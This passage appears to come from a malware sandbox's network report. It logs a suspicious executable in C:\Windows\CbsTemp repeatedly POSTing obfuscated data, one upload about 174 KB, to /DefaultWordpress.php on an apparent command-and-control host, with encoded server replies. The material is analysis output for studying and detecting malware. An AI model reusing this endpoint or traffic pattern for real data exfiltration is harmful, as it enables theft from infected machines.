                                                          Oct 20, 2024 18:17:54.763739109 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:55.183435917 CEST1236INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W79xskmutCc6I2FhVeaf5UqMTBNEEJEBhxtrW7uKPiPWLMn%2FqfcfTcKcxHbq6gJGEFqdkR5SkFmvjZTg47XtOSUsTs5XtjfsO92Shr1srWRanv9B88KLvuxHC5pj3lL2L4Wv901PXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a521cbf6a2710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11536&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=654&delivery_rate=120295&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 35 35 30 0d 0a 56 4a 7e 4e 7a 6e 68 5a 6f 5b 68 05 7f 72 68 58 7e 5e 78 51 6b 63 66 51 79 63 52 06 7d 5c 64 46 74 4d 7d 40 79 07 62 5f 77 66 74 4a 7c 71 78 01 55 4b 72 55 63 62 6b 44 7d 71 65 05 68 59 65 50 7b 00 6b 55 7c 60 60 5c 75 5c 7e 5c 63 61 6e 5d 68 5f 79 58 7f 7c 56 08 6a 67 64 58 62 66 7b 06 7c 5c 7d 01 69 70 5c 58 78 01 6b 5f 6c 67 68 4f 78 43 73 49 7a 72 60 49 6c 5d 5f 5b 7f 60 6b 5b 6f 67 6f 59 7e 4c 60 5f 76 5f 7b 5d 7a 51 41 5b 68 77 52 4f 7d 72 61 40 62 7f 6c 04 6f 7c 7f 5a 77 70 72 40 6d 07 71 4a 69 6c 66 41 7a 62 66 46 75 73 67 49 61 4f 7c 4f 77 62 7e 50 7e 5d 79 5f 60 5c 6e 5f 76 66 68 09 7e 7c 65 07 60 6f 70 04 7e 63 6c 06 78 6c 5d 03 6c 60 66 01 6b 6d 68 08 60 64 7c 04 7e 62 72 09 6a 43 55 0d 7a 6d 75 5a 6a 72 69 06 7b 5d 46 51 7d 7f 7c 0c 69 59 63 52 6a 01 6d 58 78 0b 78 5e 78 72 74 05 6b 61 73 07 7d 5e 70 54 68 59 76 52 6d 4d 70 00 6a 62 74 46 60 5d 79 51 7b 5c 79 02 76 58 56 00 7d 76 78 40 7d 66 7d 09 74 72 6b 4a 7c 62 79 4d 7f 77 6a 0d 78 58 70 40 7d 73 67 02 75 72 71 05 76 [TRUNCATED]
                                                          Data Ascii: 550VJ~NznhZo[hrhX~^xQkcfQycR}\dFtM}@yb_wftJ|qxUKrUcbkD}qehYeP{kU|``\u\~\can]h_yX|VjgdXbf{|\}ip\Xxk_lghOxCsIzr`Il]_[`k[ogoY~L`_v_{]zQA[hwRO}ra@blo|Zwpr@mqJilfAzbfFusgIaO|Owb~P~]y_`\n_vfh~|e`op~clxl]l`fkmh`d|~brjCUzmuZjri{]FQ}|iYcRjmXxx^xrtkas}^pThYvRmMpjbtF`]yQ{\yvXV}vx@}f}trkJ|byMwjxXp@}sgurqvq_J~qzF~R|}IQv_YJ{byJ~p}JygZLygpOym{KybVzc~L|^|Kyg`J~roNuOR}BwE}wh|qeCw|Zx|Zw`b{aaH}|bxarwsoIwaVAw_b|p~wLSMueZ@l}t|l
                                                          Oct 20, 2024 18:17:55.183458090 CEST904INData Raw: 4c 7f 5d 68 07 79 7c 51 06 7b 60 50 4b 7f 7d 52 08 74 77 5a 4e 7e 4c 6e 41 7d 7d 67 0a 78 7d 5c 05 7f 62 79 04 7c 60 56 08 7f 42 78 0b 7d 60 70 0b 7c 77 54 07 78 43 6b 4b 79 72 60 4b 7e 61 59 01 7d 49 7b 4f 7f 70 5b 0c 79 5d 5e 4c 7d 4c 60 48 77
                                                          Data Ascii: L]hy|Q{`PK}RtwZN~LnA}}gx}\by|`VBx}`p|wTxCkKyr`K~aY}I{Op[y]^L}L`HwsiBza}JwfpJ|fh~X_trw\aO|Ybxft@}sUubuvquI|qv~RV}IuagJ{r_|`}yglLxIpBxCQzrp{cbO{]NZo^|J~L|^uqx~RoEYVAXqu[{lZt}R{aSil~_z\yvxBagx[L~JxYe\c[
                                                          Oct 20, 2024 18:17:55.371898890 CEST286OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 384
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:55.776500940 CEST670OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 384
                                                          Expect: 100-continue
                                                          Data Raw: 5b 5e 59 5f 5a 5f 51 54 54 5b 52 57 50 59 57 56 50 50 5d 5c 50 52 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c 54 54 50 45 5a 41 53 5b 5a 51 5e 50 58 55 50 5f 5a 5d 57 52 5e 5e 5f 55 41 58 50 5a 5d 58 55 5e 5d 5e 46 53 55 5d 50 58 59 52 51 5f 58 58 59 5c 5e 52 58 5c 5e 5d 5e 5a 59 54 5c 5d 5b 5d 57 51 56 56 51 5c 5d 47 59 5b 5d 59 5f 59 52 55 59 57 5d 43 58 5c 51 53 57 43 54 5d 5d 5b 5f 5b 58 5e 5c 5f 46 51 5e 5c 09 13 20 15 3e 1d 25 5f 31 05 3e 0e 2b 20 23 5b 26 28 35 1f 3f 2e 20 1f 3e 01 0a 5d 27 04 20 01 32 57 23 5a 24 2b 26 58 27 00 2d 07 28 10 23 46 01 17 20 1b 24 07 00 50 2e 05 28 11 26 32 28 5c 24 2f 20 5c 20 03 2b 10 31 13 26 13 33 06 33 55 3d 2f 06 55 2e 3e 07 51 2d 13 38 05 2d 22 36 01 24 0d 0c 15 32 3a 39 5a 32 0d 2f 10 21 02 25 07 23 11 35 56 3a 1f 0d 02 38 01 3e 00 3e 2b 2c 16 29 03 0e 15 28 16 20 05 23 0a 20 1a 32 2d 28 0d 33 3d 13 5e 3f 31 03 11 2a 04 [TRUNCATED]
                                                          Data Ascii: [^Y_Z_QTT[RWPYWVPP]\PRW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >%_1>+ #[&(5?. >]' 2W#Z$+&X'-(#F $P.(&2(\$/ \ +1&33U=/U.>Q-8-"6$2:9Z2/!%#5V:8>>+,)( # 2-(3=^?1*6V.79/8 [!(==])([#2??,?)3/[S8VT
                                                          Oct 20, 2024 18:17:56.576639891 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:56.797019958 CEST932INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdG2D38bc1kRY2W4BqQA1aiurxYPSY2PAFdsubXONj1JeeZvg5jg9Szd8iQQYfYfMcd3qdm8r2SILGMOBVXZSk7sbcAZSZSwdplCTn6wjPBm49aFsptDGcm2ADKgJzPy9CdMLk1LjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52281b102710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11573&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2190&recv_bytes=1324&delivery_rate=369670&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 33 01 2f 56 2a 2f 24 56 2e 3e 0f 1c 2c 2d 20 02 3a 0f 08 06 30 0a 22 5c 26 29 2d 5a 24 23 3c 07 21 5a 32 59 23 59 31 1d 2e 26 28 5e 07 12 25 04 2b 12 33 07 2a 13 34 5c 28 16 2b 06 36 27 0d 06 27 2e 2f 1e 30 2d 25 17 3e 21 29 58 28 2d 2e 50 2d 37 3e 1e 2d 5e 30 59 20 3a 22 53 03 13 25 10 29 20 3f 06 22 21 2b 5a 3c 03 34 00 3c 38 25 05 29 0a 37 58 29 3b 27 58 38 2e 32 5a 30 3c 2b 02 25 59 3f 04 25 03 27 50 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&3/V*/$V.>,- :0"\&)-Z$#<!Z2Y#Y1.&(^%+3*4\(+6''./0-%>!)X(-.P-7>-^0Y :"S%) ?"!+Z<4<8%)7X);'X8.2Z0<+%Y?%'P0$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549782188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:17:56.414474010 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:56.760993004 CEST2528OUTData Raw: 5b 59 59 5e 5a 52 51 57 54 5b 52 57 50 5e 57 50 50 51 5d 5e 50 56 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [YY^ZRQWT[RWP^WPPQ]^PVWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _=1(=T(3'$("<X<>3'_&2?'9$."?#F $P.4
                                                          Oct 20, 2024 18:17:57.217400074 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:57.586172104 CEST789INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92FqvMADGNSm6XJktQepEyJjYpcP1%2B9RJHj2NWbI8p5XBT1bMtejHpfO5jf%2B7gHbPDprJ%2BQq6HWJwmFPpX9g21%2BrypQy0pl7kYkGf8rIkUvXrTGSoLXxbNo6sD0rcrtDECGDOIFgaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a522c1fdffae7-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12574&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=122961&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549784188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:17:57.181180000 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1852
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:57.527158976 CEST1852OUTData Raw: 5e 5d 59 5f 5f 5f 54 52 54 5b 52 57 50 5d 57 55 50 51 5d 5b 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]Y___TRT[RWP]WUPQ][P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#= "&8-<8&;:=.*,$3><2,'Y'-+#F $P.
                                                          Oct 20, 2024 18:17:57.956057072 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.169543028 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.321239948 CEST939INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zkFGS9nQXzrC3v4p6%2BNijleX6dLiuvXDkVvnxHkOKgreQ1P09t9vGwjz5editynGmfK8%2BHQ%2BSTs7QRtVaRYf%2BiDbR09CiBzbkXkIFvGt2hgfmQuVbKxQhBIN4occXU1RWDoJeO913A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5230bac5f9f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11544&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2139&delivery_rate=125705&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 33 01 20 0e 28 3c 2c 54 3a 10 2e 0d 3a 3e 23 5c 2e 31 29 5e 30 0a 26 59 26 5c 3a 02 32 55 37 12 35 02 0b 06 37 01 36 0c 2e 26 28 5e 07 12 25 02 3d 2c 2f 05 3e 3e 28 5e 2b 38 28 58 21 09 2b 42 27 3d 20 0c 30 3d 1b 1a 3e 32 22 03 3e 03 26 56 39 34 08 1b 39 01 2c 5a 20 10 22 53 03 13 26 02 29 30 20 12 35 32 19 5b 3c 03 23 13 2b 3b 3a 5d 3e 0d 2f 5d 29 38 3c 06 3b 04 3a 5b 27 06 28 1c 26 3f 0a 59 32 04 23 1a 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%3 (<,T:.:>#\.1)^0&Y&\:2U7576.&(^%=,/>>(^+8(X!+B'= 0=>2">&V949,Z "S&)0 52[<#+;:]>/])8<;:['(&?Y2#0$^-/W6[O0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549789188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:17:57.762398958 CEST287OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:58.120415926 CEST2528OUTData Raw: 5b 50 59 59 5f 5f 54 51 54 5b 52 57 50 5d 57 57 50 59 5d 5a 50 52 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PYY__TQT[RWP]WWPY]ZPRW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#) .28%T(0+^&(%W?<)<40$%+_32Z3>+:#F $P.
                                                          Oct 20, 2024 18:17:58.547938108 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.956697941 CEST787INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lnu6MJ5EjEp60TM9o3Ybt5OaKlAGkzhtd7SZUf75eRPgxYS1jNHEw4rMl%2BnSk3mmMLFTIWcXf7H8kroF1d%2BRFOf5XCn4ZAfcmDWVwTObt7UufZoo3M6PNsQs7evSImN1Pf%2BMNZ4qgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52346d4667f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13087&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112588&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549802188.114.96.380892C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 20, 2024 18:18:00.153618097 CEST289OUTPOST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 174204
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:00.511051893 CEST12360OUTData Raw: 5b 59 59 59 5f 5d 51 5d 54 5b 52 57 50 59 57 54 50 5b 5d 56 50 5c 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [YYY_]Q]T[RWPYWTP[]VP\WT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (#=&? (&(?X;>700$1408>'-&?#F $P.(
                                                          Oct 20, 2024 18:18:00.516007900 CEST9888OUTData Raw: 3c 31 1b 5c 13 21 04 5e 06 05 2d 0a 39 27 25 0b 35 29 0d 5a 23 13 3d 1d 28 5b 26 30 2b 3c 3f 1d 22 21 2b 1d 2b 02 1a 18 29 39 31 01 13 30 16 12 05 02 02 5a 34 2d 31 2a 3e 59 58 3f 09 2f 3f 1d 26 2b 12 08 3f 2c 58 2c 00 30 5c 07 03 5e 08 08 08 37
                                                          Data Ascii: <1\!^-9'%5)Z#=([&0+<?"!++)910Z4-1*>YX?/?&+?,X,0\^7',7W8-26%)1!:?:"3!5?:^)3.[4>Z1> ,-4_9-;!,=]+;: 2^/!!>:/%'Z$*_"X<=.Y611!,7V*V)&*[8W)=14-*3\4?9<:Y7
                                                          Oct 20, 2024 18:18:00.516036034 CEST2472OUTData Raw: 3e 36 05 06 38 01 3a 21 2a 3a 0d 1c 08 32 37 18 22 5f 06 1c 24 59 20 3a 31 58 39 02 26 2e 2c 34 2b 59 2f 14 36 2f 51 31 02 2e 3c 22 3a 55 32 59 0f 20 1f 1b 0c 39 04 07 0a 20 0e 33 22 58 0f 3e 3a 3c 00 0e 2c 3d 0d 1c 34 59 5b 11 21 5a 5c 5e 06 3d
                                                          Data Ascii: >68:!*:27"_$Y :1X9&.,4+Y/6/Q1.<":U2Y 9 3"X>:<,=4Y[!Z\^=4)?#5<2X0=>5"2YY3,.T-B09;^1" 7T4_T#2-,()*"V0970;/>1,;>U_<<*8"'Z"+/),=''Z=/(U8;2"5BR!9 Z2W> #'6-P3W=:]+=;^;+%"Y??%$?Y10_
                                                          Oct 20, 2024 18:18:00.516144037 CEST7416OUTData Raw: 05 31 15 26 30 5c 2e 41 39 5f 02 2c 3d 33 2f 0c 3f 08 20 40 24 24 3d 11 05 35 56 2d 3a 05 33 21 0e 30 2c 24 27 2f 2f 21 35 3f 33 0c 34 33 3a 05 3d 3a 2e 09 3f 20 3c 06 0a 2f 14 34 10 3f 23 27 04 06 19 00 0b 04 5b 21 31 09 02 5a 3d 3a 39 39 33 5a
                                                          Data Ascii: 1&0\.A9_,=3/? @$$=5V-:3!0,$'//!5?343:=:.? </4?#'[!1Z=:993ZV.)8&]5;/>'+Y+\3;$;-!08Z>(.2>4<!4S\19>%W!:Y&=-=43 8==,3?2 "$8>316'-.!(>5>4(["?1!,:**0+_"<4Z7.'43)4!9>4
                                                          Oct 20, 2024 18:18:00.516293049 CEST2472OUTData Raw: 27 36 38 38 30 59 3b 3f 32 33 27 5b 2f 3b 0f 1c 30 28 1e 01 33 00 33 3e 09 0a 28 1a 3c 39 29 32 32 1e 29 2c 37 14 0e 5a 25 0c 1e 5d 26 2f 06 5b 3e 22 28 1a 34 0a 26 3d 3a 37 3a 32 28 56 1e 1f 0d 34 0b 54 26 00 3b 2c 04 5a 2f 09 3d 2c 3f 1d 39 09
                                                          Data Ascii: '6880Y;?23'[/;0(33>(<9)22),7Z%]&/[>"(4&=:7:2(V4T&;,Z/=,?9%*$!%*Y*2;]56^;738/ ;15$-,5/'-=.&=2<T6<^: WZ?93T9<%390Y#]29?*"S0%:.ST3Z:%3>\2,4%4#/9[7.#5(.W?]X;UV4*?
                                                          Oct 20, 2024 18:18:00.516625881 CEST2472OUTData Raw: 00 33 3d 5f 21 3f 09 2a 36 2c 55 5d 03 06 33 3e 22 27 24 36 27 3d 34 34 38 3f 3a 58 26 22 2e 5d 34 2c 53 57 28 42 00 1f 33 2b 1d 27 22 31 1b 55 32 3f 18 22 33 22 01 5a 0e 20 30 3a 3f 59 57 20 30 01 08 5c 13 57 3c 06 30 24 2b 12 00 3f 2d 33 24 5a
                                                          Data Ascii: 3=_!?*6,U]3>"'$6'=448?:X&".]4,SW(B3+'"1U2?"3"Z 0:?YW 0\W<0$+?-3$Z'Z8#;]>:T=*10\;-G^<%>- 0"4=1-V345!)P>"0$7:)>Y _?#$;.6&=;1*?%0<<$889!>>6)1$7;:*0'!*3?:Z$&,?0X0)>42"/673;=).&
                                                          Oct 20, 2024 18:18:00.521145105 CEST12360OUTData Raw: 0e 21 24 11 3c 16 2d 26 38 2f 1b 24 37 58 1a 24 06 3b 0d 2f 37 5e 14 2a 30 29 27 1a 30 08 37 22 3e 3a 33 32 3d 04 5f 02 26 3c 25 25 0c 2c 01 13 3d 02 15 3f 00 10 3e 05 39 59 3c 19 2c 20 1c 1f 3d 31 03 15 3b 5e 26 1c 0a 30 57 25 23 3d 2d 26 0a 3e
                                                          Data Ascii: !$<-&8/$7X$;/7^*0)'07">:32=_&<%%,=?>9Y<, =1;^&0W%#=-&>292,8-)#Y38[(0+7Y8&[%>[S>0=6'#94!1(.:/$Y2Z6##<8"8 <4%;Z">,90: \1[.0/_1,T%88($[Z2U<4+Z+9*!X#>?ZA?+R5-9; <6T4\:,?2($(> =3
                                                          Oct 20, 2024 18:18:00.521219969 CEST2472OUTData Raw: 0e 22 5e 5e 27 59 31 59 0f 23 08 56 34 08 3b 38 38 3c 26 59 3f 05 16 5f 3e 3f 2c 5c 33 38 09 22 0f 2b 38 00 3a 58 24 07 39 05 35 5e 22 21 2e 5a 3e 31 31 04 01 37 3e 1d 3a 39 11 2b 09 05 2a 1f 35 3d 3e 11 3d 3c 37 1d 36 08 02 21 2a 5b 3f 1d 05 24
                                                          Data Ascii: "^^'Y1Y#V4;88<&Y?_>?,\38"+8:X$95^"!.Z>117>:9+*5=>=<76!*[?$&/&++31-"9# <//%( ,0>#>)T76_)D=7(<3,,S><>>B;\>U&3#"?: _\V$(Z>"*??33 X'[,X9/R[3X:Y+>A7607:&9:0#->+Y[3>_,0?Z,*,U>3:$
                                                          Oct 20, 2024 18:18:00.521989107 CEST27192OUTData Raw: 0a 3a 08 0e 3c 3f 1a 1e 33 23 20 5b 38 13 0e 1a 24 21 3c 00 0b 2a 03 03 3c 2e 39 23 2b 2e 12 26 35 5d 3f 2e 3b 01 3e 0a 02 3a 37 2a 3e 32 27 16 0c 2a 01 22 0c 07 20 1a 31 03 35 10 3a 5b 57 56 3d 33 0d 23 02 10 32 29 06 03 24 05 3a 31 25 5e 09 21
                                                          Data Ascii: :<?3# [8$!<*<.9#+.&5]?.;>:7*>2'*" 15:[WV=3#2)$:1%^!\;2%146;?;X23<4X)\%6,67;!:S4$[S'YE">1":':)?X3/:.5W2=W+8$790&W92^[6[X%/7^9S,;7?$_3;9=8'W#?A:))65!:&?Y!T/#>.,
                                                          Oct 20, 2024 18:18:00.573721886 CEST23484OUTData Raw: 3e 59 17 22 3e 01 0e 30 04 05 38 56 35 07 5c 51 2e 04 3c 02 30 0f 3e 38 24 31 31 3f 0c 5c 51 04 26 20 12 20 3d 3e 29 5d 20 2f 08 20 30 23 27 1a 06 05 03 3c 21 3e 27 01 2a 21 09 1c 04 5d 3c 1a 3e 27 02 08 3c 2c 57 35 3e 3a 49 21 23 56 0b 1f 31 5b
                                                          Data Ascii: >Y">08V5\Q.<0>8$11?\Q& =>)] / 0#'<!>'*!]<>'<,W5>:I!#V1[*$4'.:!%V=:"63G[$.(\!* +(:#>9<YX9YX\<\?T4)\^:?$:?#4(%(10C\#&;+>+=2/]%<T<:1&#/-'8\1U_$--%!?<,0*+$?)U3\'
                                                          Oct 20, 2024 18:18:00.954628944 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:01.169651031 CEST25INHTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:02.799654007 CEST800INHTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNIExw1COs6yTLtsTk5T%2BbWA3Dj0GgX%2F5LKwJn%2BXUeLKkViEJQmNSozmhRjw%2BUditu8bHHEEUNLgxUq4DLRPj%2B77TGWZbSha9d6nB6W2LXQaa81UT21hlACbQkiMIINzq%2BAMEHr6Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52436883968e-SJC
